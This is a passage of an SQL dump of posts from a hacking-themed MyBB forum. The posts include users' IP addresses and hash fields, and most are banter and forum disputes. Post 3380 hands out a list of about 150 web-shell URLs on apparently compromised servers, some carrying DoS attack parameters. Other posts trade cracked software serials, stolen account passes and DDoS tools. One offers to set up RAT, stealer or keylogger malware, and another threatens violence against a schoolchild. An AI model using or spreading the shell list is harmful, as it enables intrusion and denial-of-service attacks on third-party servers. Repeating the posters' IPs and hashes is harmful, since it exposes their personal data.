this was the l33thackers forum thats why I registered now I just noticed that it isn\'t, I\'ll just stay here and see how it goes', '197.226.120.114', '-975013774', '0', '0', '216', '1349363740', '1', '1b7a5a2838efc3049e897120c510a6db', '0', '1349363740'); INSERT INTO mybb_posts VALUES('3334', '655', '3253', '43', 'RE: ANY CS5 AND SOME CS4 ADOBE SERIALS', '0', '100', '??zg???g????61', '1349373886', 'Oh I didn\'t know that. Updated.', '66.30.110.193', '1109290689', '1', '0', '0', '0', '1', '720dbf971c1ee500659d799c0ed7ce6e', '0', '0'); INSERT INTO mybb_posts VALUES('3336', '642', '3115', '61', 'RE: [FREE] DDOS, Cracking, Shells, Tools, phpfirewall and more!', '0', '100', '??zg???g????61', '1349374287', 'Downloaded the DDoS and Shells ;D', '66.30.110.193', '1109290689', '1', '0', '0', '0', '1', 'ab0396fd75459c27883803dffe4cd32c', '0', '0'); INSERT INTO mybb_posts VALUES('3337', '622', '3013', '42', 'RE: Founder of the Pirate Bay Gottfrid Svartholm Arrested in Cambodia', '0', '100', '??zg???g????61', '1349374549', 'I can confirm it was down (o_o)', '66.30.110.193', '1109290689', '1', '0', '0', '0', '1', 'b018e260f2bbe157c3d9fc32d909e495', '0', '0'); INSERT INTO mybb_posts VALUES('3338', '443', '2055', '42', 'RE: Apple Announces the iPhone 5', '0', '100', '??zg???g????61', '1349374750', 'I bought this >:) I really like it xD', '66.30.110.193', '1109290689', '1', '0', '0', '0', '1', '969ef2bbfb6eb474ead52ef8b89f02a2', '0', '0'); INSERT INTO mybb_posts VALUES('3339', '494', '2406', '42', 'RE: Chinese Man Has Lived on Water Alone for the Last 12 Years', '0', '100', '??zg???g????61', '1349374812', 'Holy shit. Hes like bear grills, except he probably doesn\'t drink his own piss.', '66.30.110.193', '1109290689', '1', '0', '0', '0', '1', 'fecf92c1ae22a605845378334140792c', '0', '0'); INSERT INTO mybb_posts VALUES('3340', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '100', '??zg???g????61', '1349374958', 'I haven\'t seen you post much.. Sorry 0_0', '66.30.110.193', '1109290689', '1', '0', '0', '0', '1', '63bca575b3a378ea1867b892be8bd284', '0', '0'); INSERT INTO mybb_posts VALUES('3341', '238', '1021', '56', 'RE: Ban the user above you', '0', '100', '??zg???g????61', '1349375048', 'Banned for not using a period. ;D', '66.30.110.193', '1109290689', '1', '0', '0', '0', '1', '567c43966c3b73c1dd22a139d9910179', '0', '0'); INSERT INTO mybb_posts VALUES('3342', '652', '3263', '7', 'RE: Being CyberBullied', '0', '100', '??zg???g????61', '1349375161', '[quote=\'NXK\' pid=\'3263\' dateline=\'1349303023\']\r\n\r\nEveryones IP\'s are logged on this site\r\n\r\nIt\'s public information. No one can hide.\r\n[/quote]\r\n\r\n\r\nI always use a VPN, and if for some reason my main VPN\'s server is down, I have a backup xDDD', '66.30.110.193', '1109290689', '1', '0', '0', '0', '1', 'd7963f827d684c986dd5a4bc8a100860', '0', '0'); INSERT INTO mybb_posts VALUES('3343', '654', '3226', '9', 'RE: Make money typing captchas', '0', '100', '??zg???g????61', '1349375214', 'This makes hardly any money xDDD', '66.30.110.193', '1109290689', '1', '0', '0', '0', '1', 'a79dc20f3d914f5184fd6a1b67ac56c5', '0', '0'); INSERT INTO mybb_posts VALUES('3344', '487', '2354', '56', 'RE: Corrupt a wish', '0', '100', '??zg???g????61', '1349375426', 'iPod you forgot to wish for something xD\n\nI wish I lived in Australia.', '66.30.110.193', '1109290689', '1', '0', '0', '0', '1', 'a2e43e78c2da2826b08bc8312b65c4ed', '0', '0'); INSERT INTO mybb_posts VALUES('3345', '253', '1106', '56', 'RE: Count to 200', '0', '100', '??zg???g????61', '1349375640', '34. Like a L33t Hacker ;D', '66.30.110.193', '1109290689', '1', '0', '0', '0', '1', '92ec2b89c402c42c9798d746d99c0bdf', '0', '0'); INSERT INTO mybb_posts VALUES('3346', '635', '3085', '7', 'RE: [Milestone] L33tHacking Forum Total 3,000 Posts', '0', '100', '??zg???g????61', '1349375704', 'Awesome. Now we just need a shitload more traffic to reach 10,000 posts ;D', '66.30.110.193', '1109290689', '1', '0', '0', '0', '1', 'a501fbf0ad6462a2a50528b6a9665d19', '0', '0'); INSERT INTO mybb_posts VALUES('3347', '341', '1614', '54', 'RE: Porn passes (big list)', '0', '100', '??zg???g????61', '1349375906', 'Holy shit hahahahahahaha I hope those aren\'t all YOURS xD', '66.30.110.193', '1109290689', '1', '0', '0', '0', '1', 'f37ad914b94d8a702195037e69e4cf1b', '0', '0'); INSERT INTO mybb_posts VALUES('3348', '376', '1738', '54', 'RE: ExpressVPN codes', '0', '100', '??zg???g????61', '1349376171', 'Aww none of them work ;((', '66.30.110.193', '1109290689', '1', '0', '0', '0', '1', '9c90be8c8a973ef3f92535d3fa7b3470', '0', '0'); INSERT INTO mybb_posts VALUES('3349', '662', '3340', '7', 'RE: Is this how you treat me?', '0', '61', 'NXK', '1349377006', '[quote=\'iTzGRONgamer61\' pid=\'3340\' dateline=\'1349374958\']\r\nI haven\'t seen you post much.. Sorry 0_0\r\n[/quote]\r\n\r\nExactly even when he was in power he never posted.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '08980cb3de2036568a3bee8ac4a3faad', '0', '0'); INSERT INTO mybb_posts VALUES('3350', '627', '3027', '33', 'RE: What can I do to improve this?', '0', '82', 'iTzIpod', '1349378135', 'Can you give me more tips? Like if I restart it, then what would I do then?\nAnd no shit that there is way too much empty space... -.- That\'s why I asked if someone could help me.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e07d6d57207cb0bcb72478b69834f5e2', '0', '0'); INSERT INTO mybb_posts VALUES('3351', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '82', 'iTzIpod', '1349378225', 'True. You just go into my Unique Section posted random stuff I didn\'t want to be posted. I didn\'t like them in the first place.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0434c2aa41810c2086dbb927a4e9dff5', '0', '0'); INSERT INTO mybb_posts VALUES('3733', '734', '0', '3', 'Downtime, PMs and Members', '0', '1', 't3h jok3r', '1349582977', 'Due to some dumbass LH has been currently banned by Google, LH will be receiving a few hours downtime everyday and I have deleted everyones PM and deleted a couple of inactive users. The reason being is that due to someone on LH our server got overloaded causing it to go down for 3-5 hours today. I\'m working on this so please bear with me. Any donations would be appreciated because within an hour I lost $30 and I\'m kinda of in need of money to keep LH up at the moment.\n\nWhenever you get the \"500 internal server error\" please wait 3-6 seconds then refresh the page or keep refreshing every sec. The error stays only for a couple of secs.', '72.231.24.165', '1223104677', '1', '0', '1', '1349584799', '1', '0ef96afb61075465a37d0d3a36059337', '0', '1349584799'); INSERT INTO mybb_posts VALUES('3354', '654', '3226', '9', 'RE: Make money typing captchas', '0', '82', 'iTzIpod', '1349378384', 'Stop making LQ posts please. And using faces as xDDDDD for example. 1 D is enough.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '471f1dbccd70fa761087cbbd637abc7c', '0', '0'); INSERT INTO mybb_posts VALUES('3355', '487', '2354', '56', 'RE: Corrupt a wish', '0', '82', 'iTzIpod', '1349378425', 'Granted. But Austrailia was bombed the next day.\nI wish I had a pet llama.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1c623b69e48706659bd6d7dbf851ff5f', '0', '0'); INSERT INTO mybb_posts VALUES('3356', '635', '3085', '7', 'RE: [Milestone] L33tHacking Forum Total 3,000 Posts', '0', '82', 'iTzIpod', '1349378474', 'We can get that at our pace. Will take a while though. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '335b424014c2678b8d5a872782f2c672', '0', '0'); INSERT INTO mybb_posts VALUES('3357', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1349378626', '35. Like an iPod.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'abaae0254ab85f8d21ef6af3066cb863', '0', '0'); INSERT INTO mybb_posts VALUES('3358', '341', '1614', '54', 'RE: Porn passes (big list)', '0', '62', 'R?????zo?', '1349378724', 'noooo I never bought porn accounts, I got a gf and she can handle it just fine :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'd42b5a7c719799cb25c0aeddb9df568c', '0', '0'); INSERT INTO mybb_posts VALUES('3359', '589', '3277', '15', 'RE: Crime24 Stealer', '0', '203', 'NeonLights', '1349379022', '[quote=\'iTzGRONgamer61\' pid=\'3277\' dateline=\'1349312804\']\r\n[quote=\'NeonLights\' pid=\'3266\' dateline=\'1349304798\']\r\ndude im blackhat...\r\nof course i can set it up for you\r\nbut i suggest using a RAT instead of a stealer \r\nfor more options and fun ;)\r\nor just stick with a direct email/keylogger\r\n[/quote]\r\n\r\n\r\n\r\nI have a cracked version of blackshades. (I think its cracked LOL) again I\'m on a mac, and VMware doesn\'t like me. I\'m having a lot of trouble setting it up, for some reason I\'m having port forwarding issues. To my knowledge, I do know how to port forward. I\'m PM\'ing you now, maybe we can do a team viewer/skype session ;D thanks bro!\r\n[/quote]\r\n\r\nhaha :) anytime man', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'dd19e2592a844978703c3759e82bfb89', '0', '0'); INSERT INTO mybb_posts VALUES('3360', '253', '1106', '56', 'RE: Count to 200', '0', '203', 'NeonLights', '1349381982', '36. i likeeeeeeeeeeeee traaaaaaaaaiiiiiinnnnnnnssssss', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '83d1e4814356e7a876f579546a4dce32', '0', '0'); INSERT INTO mybb_posts VALUES('3361', '253', '1106', '56', 'RE: Count to 200', '0', '100', '??zg???g????61', '1349387139', '37. I like titssssssssssss.', '98.217.154.10', '1658427914', '1', '0', '0', '0', '1', '730e0cdd1461d9158bb9366ca930c49d', '0', '0'); INSERT INTO mybb_posts VALUES('3362', '341', '1614', '54', 'RE: Porn passes (big list)', '0', '100', '??zg???g????61', '1349387962', 'hahahaha nice ;D [Filler 25 Chars xD]', '98.217.154.10', '1658427914', '1', '0', '0', '0', '1', '2cb14af6047921f5f17af53ed65e1196', '0', '0'); INSERT INTO mybb_posts VALUES('3363', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1349388040', '38. Like an iPod.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2ebb9d1b4a0e60aeed3ca7e1df4a912c', '0', '0'); INSERT INTO mybb_posts VALUES('3364', '253', '1106', '56', 'RE: Count to 200', '0', '100', '??zg???g????61', '1349388112', '39. -----------Filler----------------', '98.217.154.10', '1658427914', '1', '0', '0', '0', '1', '7b948fde46549d620203796b97a50db6', '0', '0'); INSERT INTO mybb_posts VALUES('3365', '253', '1106', '56', 'RE: Count to 200', '0', '203', 'NeonLights', '1349388345', '40. I LIKEEEE CRUSTY GRANDMASSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'f1fe2554d2572cc643eaa1e9c0c85fce', '0', '0'); INSERT INTO mybb_posts VALUES('3366', '652', '3227', '7', 'RE: Being CyberBullied', '0', '203', 'NeonLights', '1349388628', '[quote=\'NXK\' pid=\'3227\' dateline=\'1349235386\']\r\nWhere do you live, If you\'re in ontario Ill just come to your school with my friends and beat this kid up. how about that..\r\n[/quote]\r\n\r\nO SNAAAAPPPPPP CAREFUL GUYS!!! HIPSTER TALKING SMACK!\r\n \r\n\r\nlol... u leave in ontario? :D i live not to far from there\r\nim in montreal', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'dd851ebd3759e9ea057ae911b3f8cb77', '0', '0'); INSERT INTO mybb_posts VALUES('3367', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '3', '??????????¢™', '1349389051', 'First of all I didnt make any immature posts, If I did tell me which ones. And I posted in the Unique Section some sigs and headers that I used for my old group that says Unique. But you know what I dont care what you guys think. I was here wayyyy before you guys and I dont deserve to be treated like this. I would have been had wayyyy more posts than you but when I came back I lost most of my posts and was left with only 20 posts.\nEDIT: BTW I did contribute, I am giving away a Custom pastebin source and I was going to giveaway $10 PayPal but you guys dont appreciate anything I do so nevermind about that.', '75.22.59.99', '1259748195', '1', '0', '3', '1349389198', '1', '2c156ac50df5249b0b5c9485cccc5f2e', '0', '1349389198'); INSERT INTO mybb_posts VALUES('3368', '603', '3320', '47', 'RE: Custom Pastebin Source Code', '0', '3', '??????????¢™', '1349389133', '[quote=\'Kasual\' pid=\'3320\' dateline=\'1349347214\']\r\nCould I have this? Thanks. AND STOP WITH THE FUCKING POST AND PM\r\n[/quote]\r\n\r\nWho the fuck do you think you are? I can do what I choose to do.\r\nBLACKLISTED FROM THIS GIVEAWAY!', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '5a98c886de45943f4f1dc02a0d3235f9', '0', '0'); INSERT INTO mybb_posts VALUES('3369', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '203', 'NeonLights', '1349389612', 'lmao i think u should calm down first off all\r\nand i havent seen anything from u that is farly usefull on here...\r\n[hr]', '67.68.75.193', '1128549313', '1', '0', '203', '1349389865', '1', 'd4ff58116292535d3e7bdf1c1fe9c189', '0', '1349389865'); INSERT INTO mybb_posts VALUES('3370', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '100', '??zg???g????61', '1349390278', 'Oh so you WERE going to give out $10 but now since you\'re butt hurt you aren\'t gunna anymore... Seems legit ;D', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '9141253ee85520601c56e788979e57e3', '0', '0'); INSERT INTO mybb_posts VALUES('3371', '253', '1106', '56', 'RE: Count to 200', '0', '100', '??zg???g????61', '1349390409', '41. Grody to the max. -----Filler-----', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '622becf139e0531183db9a2365fd542a', '0', '0'); INSERT INTO mybb_posts VALUES('3372', '662', '3370', '7', 'RE: Is this how you treat me?', '0', '203', 'NeonLights', '1349390484', '[quote=\'iTzGRONgamer61\' pid=\'3370\' dateline=\'1349390278\']\r\nOh so you WERE going to give out $10 but now since you\'re butt hurt you aren\'t gunna anymore... Seems legit ;D\r\n[/quote]\r\n\r\n\r\nHAHAHAHA IKR, thats the shit everyone says when there mad to make us feel bad lmao', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'e4e956040f012f1c083a50b0dd15b59d', '0', '0'); INSERT INTO mybb_posts VALUES('3373', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '3', '??????????¢™', '1349391228', 'Yes I was going to giveaway $10 Paypal proof that I actually have the money to do it is below.\nhttp://gyazo.com/57a71890d4554a445ac7525d1262c23f', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '3e614bffd9dbd14b58aa27384e2ef19f', '0', '0'); INSERT INTO mybb_posts VALUES('3374', '652', '3206', '7', 'RE: Being CyberBullied', '0', '82', 'iTzIpod', '1349391874', 'Can you guys get back on topic now? I don\'t really care where you live. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2841c340f7d047f88f67a933bb049f62', '0', '0'); INSERT INTO mybb_posts VALUES('3375', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '82', 'iTzIpod', '1349391978', 'Would\'ve laughed if you Inspect Element that. :p\n\nBut anyways. I never really liked you. In my opinion. Some of your posts are LQ. But since you were a SMod, there was nothing I can do but respect you since you were a higher rank than me.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e59290a5373c50a4125f48a3eeeb4445', '0', '0'); INSERT INTO mybb_posts VALUES('3376', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1349392009', '42. iTzGRONGamer61 is my babe <3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '175ce3d74426287a3b52cc372dea8fea', '0', '0'); INSERT INTO mybb_posts VALUES('3377', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '3', '??????????¢™', '1349392254', 'You dont have to respect me its okay. I will be back in my position.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '8e1db4b1df245240060f146a1f040bf3', '0', '0'); INSERT INTO mybb_posts VALUES('3378', '663', '0', '61', 'Tons of shells (Unchecked)', '0', '82', 'iTzIpod', '1349392422', 'http://puu.sh/1b8ka\r\n\r\nEnjoy!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '04eb007bfb08fca16f0ffee6a0b8441b', '0', '0'); INSERT INTO mybb_posts VALUES('3379', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '82', 'iTzIpod', '1349392481', 'Why and how is that?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '12943f107524e1980315d3b29c00878a', '0', '0'); INSERT INTO mybb_posts VALUES('3380', '664', '0', '61', '100+ Shells', '0', '82', 'iTzIpod', '1349392517', '[b]Here are 150 shells I came across, enjoy! [/b]\r\n\r\n[code]http://mmx1.webs.com/shell.php \r\nhttp://mmx2.webs.com/shell.php\r\nhttp://mmx2.webs.com/shell.php?host=96.2...=80&time=6\r\nhttp://200.107.135.189/grn.php?act=engine \r\nhttp://mmx1.webs.com/shell.php?host=192....=80&time=3\r\nhttp://www.nafsiahasa.com/up/x.php\r\nhttp://217.6.136.144/webdav/shell.php\r\nhttp://mmx1.webs.com/shell.php \r\nhttp://mmx2.webs.com/shell.php \r\nhttp://mmx1.webs.com/shell.php?act=phptools&host=,\r\nhttp://mmx2.webs.com/shell.php \r\nhttp://ragersfantasy.com/bigbb.php?act=phptools \r\nhttp://mmx1.webs.com/shell.php?host=192.168.0.156&port=80&time=3\r\nhttp://mmx2.webs.com/shell.php?host=96.229.136.245&port=80&time=6\r\nhttp://mmx1.webs.com/shell.php \r\nhttp://212.152.181.186/webdav/.DAV/Emb.php?act=phptools \r\nhttp://mmx1.webs.com/shell.php\r\nhttp://62.119.49.36/webdav/shell.php\r\nhttp://124.106.114.243/grn.php\r\nhttp://mmx2.webs.com/shell.php?host=99.2...80&time=60\r\nhttp://mmx2.webs.com/shell.php?host=96.2...80&time=60\r\nhttp://mmx2.webs.com/shell.php?host=91.1...80&time=60\r\nhttp://mmx1.webs.com/shell.php?host=91.1...80&time=60\r\nhttp://mmx1.webs.com/shell.php?host=96.2...80&time=60\r\nhttp://200.107.135.189/grn.php\r\nhttp://ragersfantasy.com/bigbb.php\r\nhttp://creaven7.zikle.nl/\r\nhttp://217.6.136.144/webdav/shell.php \r\nhttp://217.128.241.163/webdav/.Dav/Emb.php\r\nhttp://217.6.136.144/webdav/greenshell.php?act=phptools&host=,\r\nhttp://mmx1.webs.com/shell.php?host=99.2...80&time=60\r\nhttp://mmx1.webs.com/shell.php?host=192....80&time=35\r\nhttp://mmx2.webs.com/shell.php?host=192....80&time=35\r\nhttp://mmx2.webs.com/shell.php?host=174....80&time=60\r\nhttp://217.6.136.144/webdav/greenshell.php \r\nhttp://217.6.136.144/webdav/greenshell.php?act=phptools \r\nhttp://161.139.194.77/webdav/shell38452.php \r\nhttp://161.139.194.77/webdav/shell74205.php\r\nhttp://kaodenuit.free.fr/post.php\r\nhttp://212.152.181.186/webdav/.DAV/Emb.php\r\nhttp://217.6.136.144/webdav/greenshell.php\r\nhttp://217.6.136.144/webdav/shell.php?act=phptools \r\nhttp://161.139.194.77/webdav/shell74205.php?act=phptools \r\nhttp://212.87.232.160/grn.php\r\nhttp://ragersfantasy.com/bigbb.php?act=phptools\r\nhttp://mmx1.webs.com/shell.php?act=phptools&host\r\nhttp://ragersfantasy.com/bigbb.php?act=phptools&host=\r\nhttp://kaodenuit.free.fr/post.php?act=phptools\r\nhttp://www.nafsiahasa.com/up/x.php?act=phptools&host\r\nhttp://www.youtube.com/results?q=allintitle:%22PHP+DoS,+Coded+by+EXE%22&num=100&hl=en&client=firefox-a&hs=Fvp&rls=org.mozilla:en-US:official&prmd=ivnsfd&filter=0&biw=1366&bih=619&um=1&ie=UTF-8&sa=N&tab=w1\r\nhttp://62.119.49.36/webdav/Shell.php\r\nhttp://200.107.135.189/grn.php?act=engine\r\nhttp://www.youtube.com/results?q=allintitle:%22PHP+DoS+Coded+by+EXE%22&num=100&hl=en&client=firefox-a&hs=Pa&rls=org.mozilla:en-US:official&prmd=ivnsfd&filter=0&biw=1366&bih=619&um=1&ie=UTF-8&sa=N&tab=w1\r\nhttp://161.139.194.77/webdav/shell38452.php?act=phptools&host=,\r\nhttp://kaodenuit.free.fr/post.php?act=phptools \r\nhttp://mmx1.webs.com/shell.php?act=phpto...1&time=100\r\nhttp://200.107.135.189/grn.php?act=engine&host=\r\nhttp://mmx1.webs.com/shell.php?act=phptools&host=\r\nhttp://62.119.49.36/webdav/shell.php?act=phptools&host=\r\nhttp://www.nafsiahasa.com/up/x.php \r\nhttp://www.youtube.com/results?q=allintitle:%22PHP+DoS+Coded+by+EXE%22&num=100&hl=en&client=firefox-a&hs=Fvp&rls=org.mozilla:en-US:official&prmd=ivnsfd&filter=0&biw=1366&bih=619&um=1&ie=UTF-8&sa=N&tab=w1\r\nhttp://mmx1.webs.com/shell.php?\r\nhttp://www.youtube.com/results?q=allintitle:%22PHP+DoS,+Coded+by+EXE%22&num=100&hl=en&client=firefox-a&hs=Pa&rls=org.mozilla:en-US:official&prmd=ivnsfd&filter=0&biw=1366&bih=619&um=1&ie=UTF-8&sa=N&tab=w1\r\nhttp://38.100.207.151/webdav/Shell.php\r\nhttp://199.195.212.101/webdav/Shell.php\r\nhttp://199.15.250.199/webdav/Shell.php\r\nhttp://62.90.192.102/webdav/Shell.php\r\nhttp://200.21.104.48/webdav/Shell.php\r\nhttp://187.33.159.118/webdav/Shell.php\r\nhttp://190.128.233.114/webdav/Shell.php\r\nhttp://23.20.103.205/webdav/Shell.php\r\nhttp://61.219.75.99/webdav/Shell.php\r\nhttp://99.240.202.214/webdav/Shell.php\r\nhttp://219.132.58.243/webdav/Shell.php\r\nhttp://117.55.241.11/webdav/Shell.php\r\nhttp://2.116.32.141/webdav/Shell.php\r\nhttp://110.138.248.99/webdav/Shell.php\r\nhttp://www.youtube.com/results?q=allintitle:%22PHP+DoS,+Coded+by+EXE%22&num=100&hl=en&client=firefox-a&hs=Fvp&rls=org.mozilla:en-US:official&prmd=ivnsfd&filter=0&biw=1366&bih=619&um=1&ie=UTF-8&sa=N&tab=w\r\nhttp://200.37.255.246/webdav/Shell.php\r\nhttp://118.97.115.131/webdav/Shell.php\r\nhttp://221.232.144.185/webdav/Shell.php\r\nhttp://88.41.31.114/webdav/Shell.php\r\nhttp://119.15.169.85/webdav/Shell.php\r\nhttp://175.45.187.125/webdav/Shell.php\r\nhttp://125.253.124.196/webdav/Shell.php\r\nhttp://124.16.138.58/webdav/Shell.php\r\nhttp://94.251.8.211/webdav/Shell.php\r\nhttp://61.233.25.26/webdav/Shell.php\r\nhttp://202.91.13.227/webdav/Shell.php\r\nhttp://82.74.210.115/webdav/Shell.php\r\nhttp://119.134.251.8/webdav/Shell.php\r\nhttp://222.124.215.10/webdav/Shell.php\r\nhttp://113.161.70.114/webdav/Shell.php\r\nhttp://180.186.74.99/webdav/Shell.php\r\nhttp://14.139.98.2/webdav/Shell.php\r\nhttp://180.248.92.248/webdav/Shell.php\r\nhttp://195.23.154.236/webdav/Shell.php\r\nhttp://81.52.163.182/webdav/Shell.php\r\nhttp://115.182.53.110/webdav/Shell.php\r\nhttp://kaodenuit.free.fr/post.php?act=phptools&host=\r\nhttp://110.138.226.111/webdav/Shell.php\r\nhttp://123.30.186.54/webdav/Shell.php\r\nhttp://122.184.0.78/webdav/Shell.php\r\nhttp://213.126.23.226/webdav/Shell.php\r\nhttp://beacheater.blogspot.com/2011/01/php-dos.html\r\nhttp://beacheater.blogspot.com/2011/01/php-dos.html \r\nhttp://firman-mannte.blogspot.com/\r\nhttp://beacheater.blogspot.com/2011/01/php-dos.html \r\nhttp://beacheater.blogspot.com/2011/01/php-dos.html \r\nhttp://firman-mannte.blogspot.com\r\nhttp://firman-mannte.blogspot.com/2011/04/packets-0-ip-post-rand-post.html\r\nhttp://beacheater.blogspot.com/2011/01/php-dos.html \r\nhttp://firman-mannte.blogspot.com/2011_04_01_archive.html\r\nhttp://firman-mannte.blogspot.com/\\\r\nhttp://firman-mannte.blogspot.com/?act=phptools&host=[/code]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3220ff14e3e66a13670ebd28323af881', '0', '0'); INSERT INTO mybb_posts VALUES('3381', '665', '0', '19', '[Junk]$5 Giveaway Contest', '0', '3', '??????????¢™', '1349392591', '[b]Hello guys I have decided to giveaway $5 PayPal, I was going to do $10 but everyone hates me here so why should I give $10 if everyone hates me? You guys are lucky that I am even giving $5 away. Well to enter in this contest just post below with a number 1-5 and you will be entered. Once the numbers are filled I will then pick the winner using random.org[/b]\r\n\r\n\r\n\r\n[align=center][color=#FFD700]1. iTzIpod\r\n2. iTzIpod\r\n3. iTzIpod\r\n4. iTzIpod\r\n5.iTzIpod[/color][/align]', '75.22.59.99', '1259748195', '1', '0', '82', '1349393491', '1', '86c0fe23baf5724197b253415d444ff0', '0', '1349393491'); INSERT INTO mybb_posts VALUES('3382', '662', '3379', '7', 'RE: Is this how you treat me?', '0', '3', '??????????¢™', '1349392647', '[quote=\'iTzIpod\' pid=\'3379\' dateline=\'1349392481\']\r\nWhy and how is that?\r\n[/quote]\r\n\r\nDont worry about it you will see.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '0afa6ce4b339ecd5456a8ccc9a96999f', '0', '0'); INSERT INTO mybb_posts VALUES('3383', '666', '0', '61', 'Detailed Animation Tutorial', '0', '82', 'iTzIpod', '1349393036', '[align=center][font=Times New Roman][size=xx-large]I.[/size][/font]\r\n[spoiler][img]http://i.imgur.com/ShZ0F.png[/img][/spoiler]\r\n\r\n[b]Create a new project and put text on your background, or wherever you want the text on.[/b]\r\n[size=xx-small][If you work with gradient, colour or pattern overlay, make sure the opacity isn\'t at 100%!][/size]\r\n\r\n\r\n[font=Times New Roman][size=xx-large]II.[/size][/font]\r\n[spoiler][img]http://i.imgur.com/W4cTU.png[/img][/spoiler]\r\n\r\n[b]On the timeline, click \"Create Frame Animation\".[/b]\r\n[size=xx-small][If you don\'t see the timeline, go to \"Window\" at the top and tick \'Timeline\'.][/size]\r\n\r\n\r\n[font=Times New Roman][size=xx-large]III.[/size][/font]\r\n[spoiler][img]http://i.imgur.com/39XhN.png[/img][/spoiler]\r\n\r\n[b]Make a new layer above the Text-Layer, select the brush tool, and make a straight white line which will be our shine.[/b]\r\n[size=xx-small][To do so, hold \"SHIFT\" on your keyboard, and draw a line from the top to the bottom.][/size]\r\n\r\n\r\n[font=Times New Roman][size=xx-large]IV.[/size][/font]\r\n[spoiler][img]http://i.imgur.com/A9R9t.png[/img][/spoiler]\r\n\r\n[b]Now create a clipping mask between both layers, the text and the shine.[/b]\r\n[size=xx-small][To do so, hold \"ALT\" on your keyboard, and click [u]between[/u] both layers.][/size]\r\n\r\n\r\n[font=Times New Roman][size=xx-large]V.[/size][/font]\r\n[spoiler][img]http://i.imgur.com/bq6ba.png[/img][/spoiler]\r\n\r\n[b]Click on the \"New Frame\" symbol, select the second frame in the timeline, and move the shine to where it should be at the end of the animation.[/b]\r\n[size=xx-small][To do so, hold \"CTRL\" on your keyboard while the \"Shine\" Layer is selected, and drag it to a specific position.][/size]\r\n\r\n\r\n[font=Times New Roman][size=xx-large]VI.[/size][/font]\r\n[spoiler][img]http://i.imgur.com/uVWEy.png[/img][/spoiler]\r\n\r\n[b]Select both frames, starting from the first.[/b]\r\n[size=xx-small][To do so, click on the first frame, then hold \"SHIFT\" on your keyboard and click on the second frame.][/size]\r\n\r\n\r\n[font=Times New Roman][size=xx-large]VII.[/size][/font]\r\n[spoiler][img]http://i.imgur.com/qOm71.png[/img][/spoiler]\r\n\r\n[b]Now click on the \"Tween\" symbol, which should open a new window.[/b]\r\n[size=xx-small][The \"Tween\" symbol is the one next to the \"New Frame\" symbol.][/size]\r\n\r\n\r\n[font=Times New Roman][size=xx-large]VIII.[/size][/font]\r\n[spoiler][img]http://i.imgur.com/HuAz8.png[/img][/spoiler]\r\n\r\n[b]Enter an amount in there from 10-50, just try out what looks the best.[/b]\r\n[size=xx-small][Don\'t forget to set unlimited looping!][/size]\r\n\r\n\r\n[font=Times New Roman][size=xx-large]IX.[/size][/font]\r\n[spoiler][img]http://i.imgur.com/3dQLZ.png[/img][/spoiler]\r\n\r\n[b]Now hold \"CTRL\", \"SHIFT\" and \"ALT\" and press \"S\" on your keyboard.[/b]\r\n[size=xx-small][To have the best quality, apply my settings.][/size]\r\n\r\n\r\n[font=Times New Roman][size=xx-large]X.[/size][/font]\r\n[spoiler][img]http://i.imgur.com/0WtYQ.gif[/img][/spoiler]\r\n\r\n[b]You\'re done, congratulations! Thanks for reading :)[/b]\r\n[size=xx-small][Tutorial written by kervz1.][/size]\r\n\r\n[color=#0000CD][b]+ + + SAYING THANKS DOESN\'T HURT + + +[/b][/color]\r\n[size=x-small]To download the PSD, click [url=http://www.mediafire.com/download.php?atovoouj5t60s16]here[/url].[/size]\r\n[/align]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5d7d2e656c76dff444c5062ace3d0f08', '0', '0'); INSERT INTO mybb_posts VALUES('3384', '665', '3381', '19', 'RE: $5 Giveaway Contest', '0', '82', 'iTzIpod', '1349393506', 'Closed/ Junked.\n[hr]\nThis thread has been junked.', '24.212.197.164', '416597412', '1', '0', '82', '1349393511', '1', 'b10ab2eed9a9c9c66464e99a86abd52a', '0', '0'); INSERT INTO mybb_posts VALUES('3385', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '82', 'iTzIpod', '1349393677', 'Well right now I don\'t think you deserve staff. You\'re acting really immature right now. You said that we hate you. We never really said that. You just misread our posts. And also, it\'s true. You never really contributed anything. And also, you say that you were going to do a $10 giveaway contest. But then you changed it to 